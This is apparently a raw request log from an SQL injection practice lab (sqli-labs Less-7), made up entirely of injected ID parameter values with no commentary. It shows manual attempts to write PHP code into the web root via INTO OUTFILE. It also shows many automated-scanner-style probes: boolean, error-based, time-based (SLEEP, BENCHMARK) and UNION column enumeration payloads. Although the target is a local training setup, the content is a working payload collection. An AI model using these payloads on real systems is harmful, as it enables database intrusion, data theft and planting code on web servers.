ID:1
ID:1
ID:1
ID:1')) union select 1,2,3 -- 
ID:-1')) union select 1,2,3 -- 
ID:-1')) and 1=(select "<?php phpinfo(); ?>"   -- 
ID:-1')) and 1=(select "<?php phpinfo(); ?>"   -- 
ID:-1')) and 1=(select "<?php phpinfo(); ?>"   -- 
ID:-1')) and 1=1   -- 
ID:-1')) and 1=2   -- 
ID:1')) and 1=1   -- 
ID:1')) and select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc.php'   -- 
ID:1')) and 1=(select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select "<?php phpinfo() ?>" into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select '<?php phpinfo() ?>' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')   -- 
ID:1')) and 1=(select '<?php phpinfo() ?>' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')-- 
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')-- 
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php')-- 
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php') and (('1
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php') and (('1=1
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php') and ((1=1
ID:1')) and 1=(select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php') and (('1'='1
ID:1')) and select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php' and (('1'='1
ID:1')) and select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php' and (('1'='1
ID:1')) and select '123' into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc1.php' and (('1'='1
ID:1
ID:1
ID:1
ID:9511
ID:6223
ID:1)(..)'.,)"
ID:1'RUDy<'">GGWe
ID:1) AND 4760=6435 AND (3956=3956
ID:1) AND 1293=1293 AND (4310=4310
ID:1 AND 5903=7142
ID:1 AND 1293=1293
ID:1 AND 3812=9739-- Zimq
ID:1 AND 1293=1293-- gnmb
ID:1') AND 9772=4467 AND ('ATmq'='ATmq
ID:1') AND 1293=1293 AND ('Cgfc'='Cgfc
ID:1') AND 5092=8057 AND ('mSzT'='mSzT
ID:1') AND (SELECT 8800 FROM(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(8800=8800,1))),0x717a717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('jVdx'='jVdx
ID:1') OR (SELECT 5713 FROM(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(5713=5713,1))),0x717a717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fAxm'='fAxm
ID:1') AND EXTRACTVALUE(3280,CONCAT(0x5c,0x7176706a71,(SELECT (ELT(3280=3280,1))),0x717a717071)) AND ('JYxP'='JYxP
ID:1') OR EXTRACTVALUE(9818,CONCAT(0x5c,0x7176706a71,(SELECT (ELT(9818=9818,1))),0x717a717071)) AND ('Wjev'='Wjev
ID:1') AND UPDATEXML(8751,CONCAT(0x2e,0x7176706a71,(SELECT (ELT(8751=8751,1))),0x717a717071),8333) AND ('BVUY'='BVUY
ID:1') OR UPDATEXML(5618,CONCAT(0x2e,0x7176706a71,(SELECT (ELT(5618=5618,1))),0x717a717071),1402) AND ('cZTW'='cZTW
ID:1') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(1059=1059,1))),0x717a717071,0x78))x)) AND ('LilM'='LilM
ID:1') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(2012=2012,1))),0x717a717071,0x78))x)) AND ('BEQP'='BEQP
ID:1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(9107=9107,1))),0x717a717071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('yaMh'='yaMh
ID:1') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(1992=1992,1))),0x717a717071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('Tvlq'='Tvlq
ID:1') AND ROW(2173,7182)>(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(2173=2173,1))),0x717a717071,FLOOR(RAND(0)*2))x FROM (SELECT 8852 UNION SELECT 6406 UNION SELECT 6464 UNION SELECT 9602)a GROUP BY x) AND ('UXeb'='UXeb
ID:1') OR ROW(3201,9465)>(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(3201=3201,1))),0x717a717071,FLOOR(RAND(0)*2))x FROM (SELECT 5696 UNION SELECT 4953 UNION SELECT 1171 UNION SELECT 7832)a GROUP BY x) AND ('jdkp'='jdkp
ID:-3046
ID:-2051') OR 1 GROUP BY CONCAT(0x7176706a71,(SELECT (CASE WHEN (6068=6068) THEN 1 ELSE 0 END)),0x717a717071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
ID:1') PROCEDURE ANALYSE(EXTRACTVALUE(7927,CONCAT(0x5c,0x7176706a71,(SELECT (CASE WHEN (7927=7927) THEN 1 ELSE 0 END)),0x717a717071)),1) AND ('QsiH'='QsiH
ID:(SELECT CONCAT(0x7176706a71,(SELECT (ELT(4392=4392,1))),0x717a717071))
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))Gwau)#
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))mafu) AND ('fKhX'='fKhX
ID:1');SELECT SLEEP(5)#
ID:1');SELECT SLEEP(5) AND ('nRBd'='nRBd
ID:1');SELECT BENCHMARK(5000000,MD5(0x74557a73))#
ID:1');SELECT BENCHMARK(5000000,MD5(0x6a516543)) AND ('mhmX'='mhmX
ID:1') AND (SELECT * FROM (SELECT(SLEEP(5)))bRol) AND ('lodI'='lodI
ID:1') AND (SELECT * FROM (SELECT(SLEEP(5)))bRol) AND ('lodI'='lodI
ID:1') ORDER BY 1-- -
ID:1') UNION ALL SELECT NULL-- -
ID:1') UNION ALL SELECT NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1') ORDER BY 1#
ID:1') UNION ALL SELECT NULL#
ID:1') UNION ALL SELECT NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:-2223') ORDER BY 1#
ID:-8453') UNION ALL SELECT 5971#
ID:-4228') UNION ALL SELECT 2570,2570#
ID:-5648') UNION ALL SELECT 4795,4795,4795#
ID:-6838') UNION ALL SELECT 9077,9077,9077,9077#
ID:-4831') UNION ALL SELECT 1370,1370,1370,1370,1370#
ID:-3647') UNION ALL SELECT 5605,5605,5605,5605,5605,5605#
ID:-1146') UNION ALL SELECT 4335,4335,4335,4335,4335,4335,4335#
ID:-3308') UNION ALL SELECT 6972,6972,6972,6972,6972,6972,6972,6972#
ID:-4428') UNION ALL SELECT 2143,2143,2143,2143,2143,2143,2143,2143,2143#
ID:-3662') UNION ALL SELECT 7509,7509,7509,7509,7509,7509,7509,7509,7509,7509#
ID:-2721') UNION ALL SELECT 3480,3480,3480,3480,3480,3480,3480,3480,3480,3480,3480#
ID:-1255') UNION ALL SELECT 1381,1381,1381,1381,1381,1381,1381,1381,1381,1381,1381,1381#
ID:-2673') UNION ALL SELECT 3330,3330,3330,3330,3330,3330,3330,3330,3330,3330,3330,3330,3330#
ID:-1120') UNION ALL SELECT 8199,8199,8199,8199,8199,8199,8199,8199,8199,8199,8199,8199,8199,8199#
ID:-1429') UNION ALL SELECT 7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566,7566#
ID:-4988') UNION ALL SELECT 7607,7607,7607,7607,7607,7607,7607,7607,7607,7607,7607,7607,7607,7607,7607,7607#
ID:-3809') UNION ALL SELECT 3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472,3472#
ID:-4123') UNION ALL SELECT 3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832#
ID:-1995') UNION ALL SELECT 7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229,7229#
ID:-8665') UNION ALL SELECT 4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547,4547#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:-3909') UNION ALL SELECT 9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468#
ID:-4402') UNION ALL SELECT 6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285,6285#
ID:-6442') UNION ALL SELECT 8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353#
ID:-8635') UNION ALL SELECT 1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083,1083#
ID:-4247') UNION ALL SELECT 9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609,9609#
ID:-9519') UNION ALL SELECT 3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843,3843#
ID:-1086') UNION ALL SELECT 4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662,4662#
ID:-4735') UNION ALL SELECT 7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279,7279#
ID:-4566') UNION ALL SELECT 7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519,7519#
ID:-6321') UNION ALL SELECT 2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457,2457#
ID:-8660') UNION ALL SELECT 7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429,7429#
ID:-4062') UNION ALL SELECT 1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108#
ID:-8091') UNION ALL SELECT 1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060,1060#
ID:-8702') UNION ALL SELECT 3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929,3929#
ID:-4097') UNION ALL SELECT 9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977#
ID:-6776') UNION ALL SELECT 4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732,4732#
ID:-6053') UNION ALL SELECT 3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519,3519#
ID:-6607') UNION ALL SELECT 2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467,2467#
ID:-5978') UNION ALL SELECT 8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046,8046#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
